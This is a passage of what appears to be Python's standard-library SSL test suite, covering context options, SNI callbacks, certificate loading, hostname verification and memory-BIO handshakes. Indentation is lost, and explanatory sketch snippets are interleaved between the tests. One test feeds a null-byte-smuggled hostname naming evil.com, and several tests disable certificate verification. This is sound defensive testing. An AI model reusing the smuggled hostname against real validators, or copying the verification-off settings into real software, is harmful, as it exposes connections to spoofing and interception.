def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
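# Illustrative sketch (the contexts and hostname are hypothetical) of what
# a real servername callback, as registered above, typically does: re-point
# the connection at a context holding the certificate for the requested
# name. Returning None continues the handshake; returning an
# ssl.ALERT_DESCRIPTION_* integer aborts it with that alert.
import ssl

default_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
vhost_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)  # would load its own chain

def pick_certificate(sslsocket, server_name, initial_context):
    if server_name == "vhost.example.com":
        sslsocket.context = vhost_ctx
    return None

default_ctx.set_servername_callback(pick_certificate)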
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "test not applicable on Windows")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
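# Condensed sketch of the two create_default_context() flavours checked
# above: the default Purpose.SERVER_AUTH yields a client-side context that
# verifies servers; Purpose.CLIENT_AUTH yields a server-side context that
# does not demand client certificates.
import ssl

client_ctx = ssl.create_default_context()            # Purpose.SERVER_AUTH
assert client_ctx.verify_mode == ssl.CERT_REQUIRED
assert client_ctx.check_hostname

server_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
assert server_ctx.verify_mode == ssl.CERT_NONE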
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED again
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
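# The coupling demonstrated above, as a minimal sketch: enabling
# check_hostname on a CERT_NONE context silently upgrades verify_mode to
# CERT_REQUIRED, and verify_mode cannot drop back to CERT_NONE while
# check_hostname is still enabled.
import ssl

ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.check_hostname = True                   # auto-sets CERT_REQUIRED
assert ctx.verify_mode == ssl.CERT_REQUIRED
try:
    ctx.verify_mode = ssl.CERT_NONE         # rejected while check_hostname is on
except ValueError:
    pass
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE             # now allowed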
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
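# Summary sketch of the MemoryBIO contract pinned down by the tests above:
# write() accepts only bytes-like objects, read() drains the buffer, and
# eof becomes true only once write_eof() has been called *and* all
# buffered data has been consumed.
import ssl

bio = ssl.MemoryBIO()
bio.write(b"payload")
bio.write_eof()
assert not bio.eof                 # data still pending
assert bio.read() == b"payload"
assert bio.eof                     # drained after write_eof()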
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
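# The retry pattern used above, factored into a hypothetical helper: on a
# non-blocking SSL socket, do_handshake() raises SSLWantReadError or
# SSLWantWriteError until the underlying socket is ready in the matching
# direction.
import select
import ssl

def finish_handshake(sock, timeout=5.0):
    """Drive do_handshake() on a non-blocking SSL socket to completion."""
    while True:
        try:
            sock.do_handshake()
            return
        except ssl.SSLWantReadError:
            select.select([sock], [], [], timeout)
        except ssl.SSLWantWriteError:
            select.select([], [sock], [], timeout)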
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm changed between OpenSSL 0.9.8n
# and 1.0.0; as a result, the capath directory must contain both
# versions of each certificate (same content, different filename)
# for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple I/O loop. Call func(*args) and, depending on the error we
# get (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
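# Standalone sketch of the memory-BIO plumbing that ssl_io_loop() drives
# above: the SSLObject never touches the network itself, so ciphertext is
# ferried by hand between the socket and the two MemoryBIO buffers.
# `sock` is assumed to be a connected TCP socket and `hostname` the name
# to verify; both are placeholders.
import socket
import ssl

def bio_handshake(sock: socket.socket, hostname: str, ctx: ssl.SSLContext):
    incoming = ssl.MemoryBIO()    # ciphertext arriving from the peer
    outgoing = ssl.MemoryBIO()    # ciphertext to send to the peer
    tls = ctx.wrap_bio(incoming, outgoing, server_hostname=hostname)
    while True:
        try:
            tls.do_handshake()
            break
        except ssl.SSLWantReadError:
            sock.sendall(outgoing.read())    # flush our pending records
            data = sock.recv(32768)
            if data:
                incoming.write(data)
            else:
                incoming.write_eof()
    sock.sendall(outgoing.read())            # flush the final flight
    return tls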
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
